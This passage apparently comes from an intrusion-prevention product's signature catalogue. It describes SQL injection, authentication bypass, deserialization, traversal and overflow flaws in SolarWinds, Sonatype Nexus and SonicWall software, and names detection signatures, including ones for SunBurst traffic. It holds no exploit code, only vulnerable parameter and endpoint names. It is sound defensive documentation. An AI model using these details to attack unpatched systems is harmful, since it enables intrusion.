Solarwinds-Srm-Profiler-Backupassociationservlet-Add-SQL-Injection

About this vulnerability:

A vulnerability in SolarWinds Storage Manager

Risk:

Moderate

First detected in:

sgpkg-ips-818-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

SolarWinds Storage Manager

Type:

Input Validation

Description:

Improper request validation causes an SQL injection vulnerability in SolarWinds Storage Manager. A successful exploitation allows an attacker to run arbitrary code on the target.

Situation:

HTTP_CRL-Solarwinds-Srm-Profiler-Backupassociationservlet-Add-SQL-Injection

References:

CVE-2016-4350
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-4350

Solarwinds-Srm-Profiler-Backupexceptionsservlet-SQL-Injection

About this vulnerability:

A vulnerability in SolarWinds Storage Manager

Risk:

Moderate

First detected in:

sgpkg-ips-761-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

SolarWinds Storage Manager

Type:

Input Validation

Description:

Insufficient parameter validation in SolarWinds Storage Manager results in a SQL injection vulnerability, which when successfully exploited, can result in a attacker gaining the ability to run arbitrary code as the SYSTEM user.

Situation:

HTTP_CRL-Solarwinds-Srm-Profiler-Backupexceptionsservlet-SQL-Injection

References:

CVE-2016-4350
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-4350

Solarwinds-Srm-Profiler-Bexdriveusagesummaryservlet-SQL-Injection

About this vulnerability:

A vulnerability in SolarWinds Storage Manager

Risk:

Moderate

First detected in:

sgpkg-ips-768-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

SolarWinds Storage Manager

Type:

Input Validation

Description:

Insufficient validation of requests results in an SQL injection vulnerability in SolarWinds Storage Manager. Successful exploitation by means of a crafted SQL query can result in the attacker gaining SYSTEM level code execution privileges on the target.

Situation:

HTTP_CRL-Solarwinds-Srm-Profiler-Bexdriveusagesummaryservlet-SQL-Injection

References:

CVE-2016-4350
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-4350

Solarwinds-Srm-Profiler-Duplicatefilesservlet-SQL-Injection

About this vulnerability:

A vulnerability in SolarWinds Storage Manager

Risk:

Moderate

First detected in:

sgpkg-ips-767-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

SolarWinds Storage Manager

Type:

Input Validation

Description:

Situation:

HTTP_CRL-Solarwinds-Srm-Profiler-Duplicatefilesservlet-SQL-Injection

References:

CVE-2016-4350
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-4350

Solarwinds-Srm-Profiler-Fileactionassignmentservlet-Assignednames-SQL-Injection

About this vulnerability:

A vulnerability in SolarWinds Storage Manager

Risk:

Moderate

First detected in:

sgpkg-ips-809-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

SolarWinds Storage Manager

Type:

Input Validation

Description:

Improper validation of HTTP requests causes an SQL injection vulnerability in SolarWinds Storage Manager. A successful exploit can allow an attacker to run arbitrary code on the target system.

Situation:

HTTP_CRL-Solarwinds-Srm-Profiler-Fileactionassignmentservlet-Assignednames-SQL-Injection

References:

CVE-2016-4350
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-4350

Solarwinds-Srm-Profiler-Hoststorageservlet-State-Filesystem-Id-SQL-Injection

About this vulnerability:

A vulnerability in SolarWinds Storage Manager

Risk:

High

First detected in:

sgpkg-ips-771-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

SolarWinds Storage Manager

Type:

Input Validation

Description:

An SQL injection vulnerability in the SolarWinds Storage Manager Resource Monitor Profiler Module, versions before 6.2.3, which allows remote attackers to execute arbitrary SQL commands, due to insufficient validation of the orderBy and orderDir parameters in HTTP requests sent to the HostStorageServlet servlet.

Situation:

HTTP_CRL-Solarwinds-Srm-Profiler-Hoststorageservlet-State-Filesystem-Id-SQL-Injection

References:

CVE-2016-4350
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-4350

Solarwinds-Srm-Profiler-Nbuerrormessageservlet-Exitcode-SQL-Injection

About this vulnerability:

A vulnerability in SolarWinds Storage Manager

Risk:

High

First detected in:

sgpkg-ips-773-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

SolarWinds Storage Manager

Type:

Input Validation

Description:

An SQL injection vulnerability in the SolarWinds Storage Manager Resource Monitor Profiler Module, versions before 6.2.3, which allows remote attackers to execute arbitrary SQL commands, due to insufficient validation of the exitCode parameter in HTTP requests sent to the NbuErrorMessageServlet servlet.

Situation:

HTTP_CRL-Solarwinds-Srm-Profiler-Nbuerrormessageservlet-Exitcode-SQL-Injection

References:

CVE-2016-4350
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-4350

Solarwinds-Srm-Profiler-Rulesmetadata-Addnewrule-SQL-Injection

About this vulnerability:	A vulnerability in SolarWinds Storage Manager
Risk:	High
First detected in:	sgpkg-ips-775-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	SolarWinds Storage Manager
Type:	Input Validation
Description:	There exists an SQL injection vulnerability in the SolarWinds Storage Manager Resource Monitor Profiler Module. A remote attacker can use this to execute arbitrary code on the affected system.
Situation:	HTTP_CRL-Solarwinds-Srm-Profiler-Rulesmetadata-Addnewrule-SQL-Injection

Solarwinds-Srm-Profiler-Scriptservlet-Scriptschedule-SQL-Injection

About this vulnerability:

A vulnerability in SolarWinds Storage Manager

Risk:

Moderate

First detected in:

sgpkg-ips-765-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

SolarWinds Storage Manager

Type:

Input Validation

Description:

Insufficient validation of requests results in an SQL injection vulnerability in the SolarWinds Storage Manager Resource Monitor Profiler module. Successful exploitation by means of a crafted SQL query can result in the attacker gaining SYSTEM level code execution privileges on the target.

Situation:

HTTP_CRL-Solarwinds-Srm-Profiler-Scriptservlet-Scriptschedule-SQL-Injection

References:

CVE-2016-4350
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-4350

Solarwinds-Srm-Profiler-Scriptservlet-State-SQL-Injection

About this vulnerability:

A vulnerability in SolarWinds Storage Manager

Risk:

Moderate

First detected in:

sgpkg-ips-769-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

SolarWinds Storage Manager

Type:

Input Validation

Description:

Situation:

HTTP_CRL-Solarwinds-Srm-Profiler-Scriptservlet-State-SQL-Injection

References:

CVE-2016-4350
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-4350

Solarwinds-Srm-Profiler-Scriptservlet-State-Upload-SQL-Injection

About this vulnerability:

A vulnerability in SolarWinds Storage Manager

Risk:

Moderate

First detected in:

sgpkg-ips-782-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

SolarWinds Storage Manager

Type:

Input Validation

Description:

Insufficient validation of HTTP requests results in an SQL injection vulnerability, which can be exploited to allow SYSTEM-level code execution on the target.

Situation:

HTTP_CS-Solarwinds-Srm-Profiler-Scriptservlet-State-Upload-SQL-Injection

References:

CVE-2016-4350
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-4350

Solarwinds-Srm-Profiler-Userdefinedfieldconfigservlet-Saveudf-SQL-Injection

About this vulnerability:

A vulnerability in SolarWinds Storage Manager

Risk:

Moderate

First detected in:

sgpkg-ips-813-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

SolarWinds Storage Manager

Type:

Input Validation

Description:

Insufficient validation of HTTP request parameters causes an SQL injection vulnerability in SolarWinds Storage Manager. A successful attack can allow the attacker to run arbitrary code on the target system.

Situation:

HTTP_CRL-Solarwinds-Srm-Profiler-Userdefinedfieldconfigservlet-Saveudf-SQL-Injection

References:

CVE-2016-4350
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-4350

Solarwinds-Srm-Profiler-Windowseventlogsservlet-SQL-Injection

About this vulnerability:

A vulnerability in SolarWinds Storage Manager

Risk:

Moderate

First detected in:

sgpkg-ips-765-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

SolarWinds Storage Manager

Type:

Input Validation

Description:

Situation:

HTTP_CRL-Solarwinds-Srm-Profiler-Windowseventlogsservlet-SQL-Injection

References:

CVE-2016-4350
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-4350

Solarwinds-Srm-Profiler-Xiotechmonitorservlet-Savesite-SQL-Injection

About this vulnerability:

A vulnerability in SolarWinds Storage Manager

Risk:

Moderate

First detected in:

sgpkg-ips-812-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

SolarWinds Storage Manager

Type:

Input Validation

Description:

Insufficient validation of HTTP requests in the SolarWinds Storage Manager Resource Monitor causes an SQL injection vulnerability. A successful exploitation can allow an attacker to run arbitrary code with system-level privileges.

Situation:

HTTP_CRL-Solarwinds-Srm-Profiler-Xiotechmonitorservlet-Savesite-SQL-Injection

References:

CVE-2016-4350
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-4350

Solarwinds-Storage-Manager-Authenticationfilter-Authentication-Bypass

About this vulnerability:

A vulnerability in SolarWinds Storage Manager

Risk:

Moderate

First detected in:

sgpkg-ips-605-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

SolarWinds Storage Manager

Type:

Malfunction

Description:

An authentication bypass vulnerability exists in SolarWinds Storage Manager. The vulnerability is due to a flaw within the AuthenticationFilter class. A remote unauthenticated attacker could exploit this vulnerability by bypassing the authentication filter and uploading malicious scripts to the target. Successful exploitation could result in code execution under the context of the system.

Situation:

HTTP_CSU-Solarwinds-Storage-Manager-Authenticationfilter-Authentication-Bypass

References:

BID-69438
http://www.securityfocus.com/bid/69438

OSVDB-110483
http://www.osvdb.org/110483

Solarwinds-Storage-Manager-Authenticationfilter-Policy-Bypass

About this vulnerability:

A vulnerability in SolarWinds Storage Manager

Risk:

High

First detected in:

sgpkg-ips-665-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

SolarWinds Storage Manager

Type:

Malfunction

Description:

A policy bypass vulnerability has been reported in SolarWinds Storage Manager. The vulnerability is due to an issue where the AuthenticationFilter class fails to properly authenticate users prior to processing requests. A remote unauthenticated user can exploit this vulnerability by sending a malicious request to the server AuthenticationFilter class. Successful exploitation could lead to a policy bypass condition on the server.

Situation:

HTTP_CSU-Solarwinds-Storage-Manager-Authenticationfilter-Authentication-Bypass

References:

CVE-2015-5371
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-5371

Solarwinds-SunBurst-Traffic

About this vulnerability:	Beacon and other traffic related to the Solarwinds SunBurst intrusion
Risk:	High
First detected in:	sgpkg-ips-1305-5242
Last changed:	sgpkg-ips-1337-5242
Platform:	Generic
Software:	SolarWinds Orion
Type:	Remote Control
Description:	Beacon and other traffic related to the Solarwinds SunBurst intrusion
Situation:	HTTP_CRL-SunBurst-SUPERNOVA-Traffic-Detected-1 HTTPS_CS-Solarwinds-SunBurst-Beacon HTTP_CSH-SunBurst-Backdoor-Traffic File-Binary_SunBurst-TEARDROP-Detected-2 File-Text_Solarwinds-SunBurst-Beacon File-Text_Solarwinds-SunBurst-COSMICGALE HTTP_SHS-Solarwinds-SunBurst-Beacon File-TextId_Solarwinds-SunBurst-Beacon File-Exe_SunBurst-TEARDROP-Detected-1 File-Exe_SunBurst-SUPERNOVA-Detected-2 File-Exe_SunBurst-SUPERNOVA-Detected-1 File-Exe_SunBurst-SUNBURST-Detected-1 File-Exe_SunBurst-SUNBURST-Detected-2 File-Exe_SunBurst-SUNBURST-Detected-3

Solarwinds-TFTP-Server-Denial-Of-Service

About this vulnerability:

A Solarwinds TFTP Server Denial Of Service vulnerability.

Risk:

Moderate

First detected in:

sgpkg-ips-720-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

SolarWinds TFTP

Type:

Input Validation

Description:

A vulnerability in SolarWinds TFTP Server which allows remote attackers to cause a denial of service condition by sending a read request with a non-ascii file name parameter while specifying a "netascii" mode parameter.

Situation:

TFTP_Solarwinds-TFTP-Server-Denial-Of-Service

References:

CVE-2010-2115
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-2115

OSVDB-64845
http://www.osvdb.org/64845

Solarwinds-Virtualization-Manager-Apache-Commons-Deserialization

About this vulnerability:

A vulnerability in SolarWinds Virtualization Manager

Risk:

High

First detected in:

sgpkg-ips-774-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

SolarWinds Virtualization Manager

Type:

Malfunction

Description:

A vulnerability in SolarWinds Virtualization Manager, versions 6.3.1 and before, which allows remote attackers to execute arbitrary commands via a crafted serialized Java object.

Situation:

Shared_CS-Java-Rmi-Object-Deserialization-Code-Execution

References:

CVE-2016-3642
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3642

Solarwinds-Web-Help-Desk-Ajaxproxy-Insecure-Deserialization

About this vulnerability:

A vulnerability in SolarWinds Web Help Desk

Risk:

High

First detected in:

sgpkg-ips-1777-5242

Last changed:

sgpkg-ips-1777-5242

Platform:

Generic

Software:

SolarWinds Web Help Desk

Type:

Input Validation

Description:

An insecure deserialization vulnerability has been reported in SolarWinds Web Help Desk. The vulnerability is due to improper validation of the JSON object sent to the AjaxProxy component. A remote, unauthenticated attacker could exploit this vulnerability by sending a crafted request to the target server. Successful exploitation could result in arbitrary code execution under the security context of SYSTEM.

Situation:

HTTP_CRL-Solarwinds-Web-Help-Desk-Ajaxproxy-Insecure-Deserialization

References:

CVE-2024-28986
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-28986

Solarwinds-Web-Help-Desk-Hard-Coded-Credentials

About this vulnerability:

A vulnerability in SolarWinds Web Help Desk

Risk:

Moderate

First detected in:

sgpkg-ips-1789-5242

Last changed:

sgpkg-ips-1789-5242

Platform:

Generic

Software:

SolarWinds Web Help Desk

Type:

Malfunction

Description:

SolarWinds Web Help Desk allows users to log in using hard-coded credentials, which allows attackers to gain the ability to access and modify arbitrary data on the service.

Situation:

HTTP_CSH-Solarwinds-Web-Help-Desk-Hard-Coded-Credentials

References:

CVE-2024-28987
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-28987

SolusLabs-SolusVM-Centralbackup-SQL-Injection

About this vulnerability:

An SQL Injection in SolusLabs SolusVM's centralbackup.php script

Risk:

Low

First detected in:

sgpkg-ips-787-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

SolusLabs SolusVM

Type:

SQL Injection

Description:

An SQL Injection vulnerability in SolusLabs SolusVM centralbackup.php's deleteid parameter before version 1.13.07.

Situation:

HTTP_CRL-SolusLabs-SolusVM-Centralbackup-SQL-Injection

References:

OSVDB-94448
http://www.osvdb.org/94448

Sonatype-Nexus-Expression-Language-Injection-CVE-2018-16621

About this vulnerability:

A vulnerability in Sonatype Nexus Repository Manager

Risk:

High

First detected in:

sgpkg-ips-1837-5242

Last changed:

sgpkg-ips-1837-5242

Platform:

Generic

Software:

Sonatype Nexus Repository Manager

Type:

Input Validation

Description:

An expression language injection vulnerability exists in Sonatype Nexus Repository Manager versions before 3.14. An attacker with an access to an administrative Nexus Repository account can use this vulnerability to execute arbitrary code.

Situation:

File-Text_Sonatype-Nexus-Expression-Language-Injection-CVE-2020-10204

References:

CVE-2018-16621
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-16621

Sonatype-Nexus-Expression-Language-Injection-CVE-2020-10204

About this vulnerability:

A vulnerability in Sonatype Nexus Repository Manager

Risk:

High

First detected in:

sgpkg-ips-1837-5242

Last changed:

sgpkg-ips-1837-5242

Platform:

Generic

Software:

Sonatype Nexus Repository Manager

Type:

Input Validation

Description:

An expression language injection vulnerability exists in Sonatype Nexus Repository Manager versions before 3.21.2. An attacker with an access to an administrative Nexus Repository account can use this vulnerability to execute arbitrary code.

Situation:

File-Text_Sonatype-Nexus-Expression-Language-Injection-CVE-2020-10204

References:

CVE-2020-10204
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-10204

Sonatype-Nexus-Repository-Manager-Contentselectorsapiresource-XSS

About this vulnerability:

A vulnerability in Sonatype Nexus Repository Manager

Risk:

Moderate

First detected in:

sgpkg-ips-1244-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Sonatype Nexus Repository Manager

Type:

Input Validation

Description:

Insufficient validation of user-sent data in the Java class ContentSelectorsApiResource causes a cross-site scripting vulnerability in Sonatype Nexus Repository Manager. A successful exploit may allow an attacker to execute arbitrary scripts in the browser of a user.

Situation:

HTTP_CRL-Sonatype-Nexus-Repository-Manager-Contentselectorsapiresource-Stored-Cross-Site-Scripting

References:

CVE-2020-10203
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-10203

Sonatype-Nexus-Repository-Manager-CVE-2019-7238-Expression-Language-Injection

About this vulnerability:

A vulnerability in Sonatype Nexus Repository Manager

Risk:

Moderate

First detected in:

sgpkg-ips-1141-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Sonatype Nexus Repository Manager

Type:

Input Validation

Description:

There has been reported an expression language injection vulnerability in Sonatype Nexus Repository Manager. This vulnerability can be exploited by sending a crafted request to the target server. Successful exploitation leads in arbitrary code execution.

Situation:

HTTP_CRL-Sonatype-Nexus-Repository-Manager-CVE-2019-7238-Expression-Language-Injection

References:

CVE-2019-7238
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7238

Sonatype-Nexus-Repository-Manager-CVE-2021-37152-Cross-Site-Scripting

About this vulnerability:

A vulnerability in Sonatype Nexus Repository Manager

Risk:

Moderate

First detected in:

sgpkg-ips-1400-5242

Last changed:

sgpkg-ips-1400-5242

Platform:

Generic

Software:

Sonatype Nexus Repository Manager

Type:

Input Validation

Description:

Rendering of unverified web resources uploaded to nexus repositories in the browser causes a cross-site scripting vulnerability in Sonatype Nexus Repository Manager.

Situation:

HTTP_CSU-Sonatype-Nexus-Repository-Manager-CVE-2021-37152-Cross-Site-Scripting

References:

CVE-2021-37152
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-37152

Sonatype-Nexus-Repository-Manager-Webresourceservice-Directory-Traversal

About this vulnerability:

A vulnerability in Sonatype Nexus Repository Manager 3 OSS/Pro

Risk:

High

First detected in:

sgpkg-ips-1732-5242

Last changed:

sgpkg-ips-1732-5242

Platform:

Generic

Software:

Sonatype Nexus Repository Manager

Type:

Directory Traversal

Description:

A directory traversal vulnerability has been reported in Sonatype Nexus Repository Manager. The vulnerability is due to insufficient validation of the URL provided in the HTTP request. A remote, unauthenticated attacker can exploit this vulnerability by sending a crafted request to the target server. Successful exploitation could allow an attacker to perform directory traversal to read sensitive files.

Situation:

HTTP_CS-Sonatype-Nexus-Repository-Manager-Webresourceservice-Directory-Traversal
HTTP_CSU-Potential-Dot-Dot-Slash-Directory-Traversal

References:

CVE-2024-4956
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-4956

SonicWall-Command-Injection-CVE-2021-20039

About this vulnerability:

An attempt to exploit a vulnerability in SonicWall

Risk:

Moderate

First detected in:

sgpkg-ips-1430-5242

Last changed:

sgpkg-ips-1430-5242

Platform:

Generic

Software:

SonicWall

Type:

Code Injection

Description:

A command injection vulnerability has been reported in the SonicWall SMA 100 series. An authenticated attacker can exploit this vulnerability via a crafted HTTP POST request to /cgi-bin/viewcert. A successful attack can allow command injection with the 'nobody' privileges.

Situation:

HTTP_CRL-SonicWall-Command-Injection-CVE-2021-20039

References:

CVE-2021-20039
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-20039

SonicWall-Email-Security-Path-Traversal-CVE-2021-20023

About this vulnerability:

A vulnerability in SonicWall Email Security

Risk:

High

First detected in:

sgpkg-ips-1405-5242

Last changed:

sgpkg-ips-1405-5242

Platform:

Generic

Software:

SonicWall Email Security

Type:

Directory Traversal

Description:

There exists a post-auth arbitrary file read vulnerability in SonicWall Email Security.

Situation:

HTTP_CSU-SonicWall-Email-Security-Path-Traversal-CVE-2021-20023

References:

CVE-2021-20023
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-20023

SonicWall-Gms-And-Analytics-Detectinjection-SQL-Injection

About this vulnerability:

A vulnerability in SonicWall Analytics

Risk:

High

First detected in:

sgpkg-ips-1621-5242

Last changed:

sgpkg-ips-1625-5242

Platform:

Generic

Software:

SonicWall Analytics; SonicWall GMS

Type:

Input Validation

Description:

An SQL injection vulnerability has been reported in SonicWall GMS and Analytics. The vulnerability is due to a security filter bypass that allows an attacker to add crafted data to SQL queries without prior validation. A remote, unauthenticated attacker could exploit this vulnerability by sending crafted requests to the target server. Successful exploitation could result in arbitrary SQL command execution against the database on the target server which could be used to achieve arbitrary code execution under the security context of the running service.

Situation:

HTTP_CSU-SonicWall-Gms-And-Analytics-Detectinjection-Potential-SQL-Injection
HTTP_CSU-SonicWall-Gms-And-Analytics-Detectinjection-SQL-Injection
HTTP_CRL-SonicWall-Gms-And-Analytics-Detectinjection-Security-Filter-Bypass
HTTP_CRL-SonicWall-Gms-And-Analytics-Detectinjection-SQL-Injection
HTTP_CSH-SonicWall-Gms-And-Analytics-Detectinjection-SQL-Injection

References:

CVE-2023-34133
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-34133

SonicWall-Gms-And-Analytics-Performdownloadtask-Directory-Traversal

About this vulnerability:

A vulnerability in SonicWall Analytics

Risk:

Moderate

First detected in:

sgpkg-ips-1617-5242

Last changed:

sgpkg-ips-1617-5242

Platform:

Generic

Software:

SonicWall

Type:

Directory Traversal

Description:

Improper validation of user input used in file operations when downloading backup files causes a directory traversal vulnerability in SonicWall GMS and Analytics. A successful exploitation allows an attacker to read arbitrary files on the target system.

Situation:

HTTP_CRL-SonicWall-Gms-And-Analytics-Performdownloadtask-Directory-Traversal

References:

CVE-2023-34125
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-34125

SonicWall-Gms-And-Analytics-Searchfilter-Command-Injection

About this vulnerability:

A vulnerability in SonicWall Analytics

Risk:

High

First detected in:

sgpkg-ips-1621-5242

Last changed:

sgpkg-ips-1621-5242

Platform:

Generic

Software:

SonicWall Analytics; SonicWall GMS

Type:

Input Validation

Description:

A command injection vulnerability has been reported in SonicWall GMS and Analytics. The vulnerability is due to improper validation of user data in the searchFilter parameter used in commands. A remote, authenticated attacker could exploit this vulnerability by sending crafted requests to the target server. Successful exploitation could result arbitrary command execution under the security context of SYSTEM.

Situation:

HTTP_CSU-SonicWall-Gms-And-Analytics-Searchfilter-Command-Injection

References:

CVE-2023-34127
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-34127

SonicWall-Gms-And-Analytics-Unzipfiles-Directory-Traversal

About this vulnerability:

A vulnerability in SonicWall Analytics

Risk:

High

First detected in:

sgpkg-ips-1634-5242

Last changed:

sgpkg-ips-1634-5242

Platform:

Generic

Software:

SonicWall Analytics; SonicWall GMS

Type:

Directory Traversal

Description:

A directory traversal vulnerability has been reported in SonicWall GMS and Analytics. The vulnerability is due to improper validation of file names contained in zip files sent in user requests. A remote, authenticated attacker could exploit this vulnerability by sending crafted requests to the target server. Successful exploitation could, in the worst case, result in arbitrary code execution under the security context of SYSTEM or the root user.

Situation:

File-Member-Name_SonicWall-Gms-And-Analytics-Unzipfiles-Directory-Traversal

References:

CVE-2023-34129
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-34129

SonicWall-Gms-Virtual-Appliance-Command-Injection

About this vulnerability:	A vulnerability in SonicWall GMS Virtual Appliance
Risk:	High
First detected in:	sgpkg-ips-1111-5242
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	SonicWall GMS
Type:	Input Validation
Description:	A vulnerability in SonicWall GMS Virtual Appliance, version 8.1 (Build 8110.1197), which allows remote attackers to execute arbitrary commands through the timeSetup.sh script.
Situation:	File-TextId_SonicWall-Gms-Virtual-Appliance-Command-Injection

SonicWall-Multiple-Products-Authentication-Bypass

About this vulnerability:

A vulnerability in SonicWall Analyzer

Risk:

High

First detected in:

sgpkg-ips-548-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

SonicWall Analyzer; SonicWall GMS; SonicWall UMA EM5000; SonicWall ViewPoint

Type:

Malfunction

Description:

An authentication bypass vulnerability has been reported in multiple SonicWall products. The vulnerability allows a user to send a request to the appliance management interface with the parameter none zero skipSessionCheck value. This will allow the user to bypass authentication. A remote user can exploit this vulnerability to gain full access to the vulnerable system.

Situation:

HTTP_CRL-SonicWall-Multiple-Products-Authentication-Bypass

References:

CVE-2013-1359
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1359

BID-57445
http://www.securityfocus.com/bid/57445

OSVDB-89347
http://www.osvdb.org/89347

SonicWall-Remote-Code-Execution-CVE-2021-20038

About this vulnerability:

An attempt to exploit a vulnerability in SonicWall

Risk:

High

First detected in:

sgpkg-ips-1429-5242

Last changed:

sgpkg-ips-1429-5242

Platform:

Generic

Software:

SonicWall

Type:

Buffer Overflow

Description:

A stack buffer overflow vulnerability has been reported in the web interface of SonicWall SMA 100 series. An unauthenticated attacker can exploit this vulnerability via crafted HTTP requests. A successful attack can allow arbitrary code execution with the 'nobody' privileges.

Situation:

HTTP_CSU-SonicWall-Remote-Code-Execution-CVE-2021-20038

References:

CVE-2021-20038
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-20038

SonicWall-Secure-Mobile-Access-Arbitrary-File-Deletion

About this vulnerability:

An attempt to exploit a vulnerability in SonicWall Mobile Access detected

Risk:

High

First detected in:

sgpkg-ips-1396-5242

Last changed:

sgpkg-ips-1396-5242

Platform:

Generic

Software:

SonicWall Mobile Access

Type:

Malfunction

Description:

An attempt to exploit a vulnerability in SonicWall Mobile Access detected.

Situation:

HTTP_CSU-SonicWall-Secure-Mobile-Access-Arbitrary-File-Deletion

References:

CVE-2021-20034
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-20034

SonicWall-SMA100-SQL-Injection

About this vulnerability:

An attempt to exploit a vulnerability in SonicWall SMA100 detected

Risk:

High

First detected in:

sgpkg-ips-1408-5242

Last changed:

sgpkg-ips-1408-5242

Platform:

Generic

Software:

SonicWall

Type:

Malfunction

Description:

An attempt to exploit a vulnerability in SonicWall SMA100 detected.

Situation:

HTTP_CRL-SonicWall-SMA100-SQL-Injection

References:

CVE-2019-7481
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7481

SonicWall-SSL-VPN-End-Point-Interrogator-Installer-ActiveX-Control

About this vulnerability:	A vulnerability in SonicWALL SSL-VPN End-Point Interrogator/Installer ActiveX Control
Risk:	High
First detected in:	sgpkg-ips-377-4219
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	SonicWall SSL-VPN
Type:	Format String
Description:	There exists a code execution vulnerability in SonicWALL SSL-VPN End-Point Interrogator/Installer ActiveX controls.
Situation:	HTTP_SS-SonicWall-SSL-VPN-End-Point-Interrogator-Installer-ActiveX-Control File-Text_SonicWall-SSL-VPN-End-Point-Interrogator-Installer-ActiveX-Control

SonicWall-SSL-VPN-NetExtender-NELaunchCtrl-ActiveX-Control-Buffer-Overflow

About this vulnerability:

Buffer overflow vulnerability in SonicWall SSL-VPN NetExtender

Risk:

High

First detected in:

sgpkg-ips-133-2032

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

SonicWall SSL-VPN NetExtender

Type:

Malfunction

Description:

There is a buffer overflow vulnerability in SonicWall SSL-VPN NetExtender. The vulnerability allows arbitary code execution in the context of the current user.

Situation:

HTTP_SS-SonicWall-SSL-VPN-NetExtender-NELaunchCtrl-ActiveX-Control-BOF
File-Text_SonicWall-SSL-VPN-NetExtender-NELaunchCtrl-ActiveX-Control-BOF

References:

CVE-2007-5603
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5603

BID-26288
http://www.securityfocus.com/bid/26288

SonicWall-SSLVPN-Session-Hijacking-CVE-2024-53704

About this vulnerability:

An attempt to exploit a vulnerability in SonicWall SSLVPN detected

Risk:

High

First detected in:

sgpkg-ips-1837-5242

Last changed:

sgpkg-ips-1838-5242

Platform:

Generic

Software:

SonicWall SSL-VPN

Type:

Input Validation

Description:

An improper authentication vulnerability in the SonicWall SSLVPN's authentication mechanism allows a remote attacker to hijack active SSLVPN sessions and gain unauthorized network access.

Situation:

HTTP_CSU-SonicWall-SSLVPN-Session-Hijacking-CVE-2024-53704
HTTP_CSH-SonicWall-SSLVPN-Session-Hijacking-CVE-2024-53704

References:

CVE-2024-53704
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-53704

SonicWall-Stack-Buffer-Overflow-CVE-2022-22274

About this vulnerability:

A vulnerability in SonicWall

Risk:

High

First detected in:

sgpkg-ips-1676-5242

Last changed:

sgpkg-ips-1676-5242

Platform:

Generic

Software:

SonicWall

Type:

Buffer Overflow

Description:

A buffer overflow vulnerability has been reported in SonicOS. An unauthenticated remote attacker can use this vulnerability to cause a denial of service condition or potentially execute code via a crafted HTTP request.

Situation:

HTTP_CS-SonicWall-Stack-Buffer-Overflow-CVE-2022-22274

References:

CVE-2022-22274
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-22274

SonicWall-Stack-Buffer-Overflow-CVE-2023-0656

About this vulnerability:

A vulnerability in SonicWall

Risk:

High

First detected in:

sgpkg-ips-1676-5242

Last changed:

sgpkg-ips-1676-5242

Platform:

Generic

Software:

SonicWall

Type:

Buffer Overflow

Description:

Situation:

HTTP_CS-SonicWall-Stack-Buffer-Overflow-CVE-2023-0656

References:

CVE-2023-0656
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0656

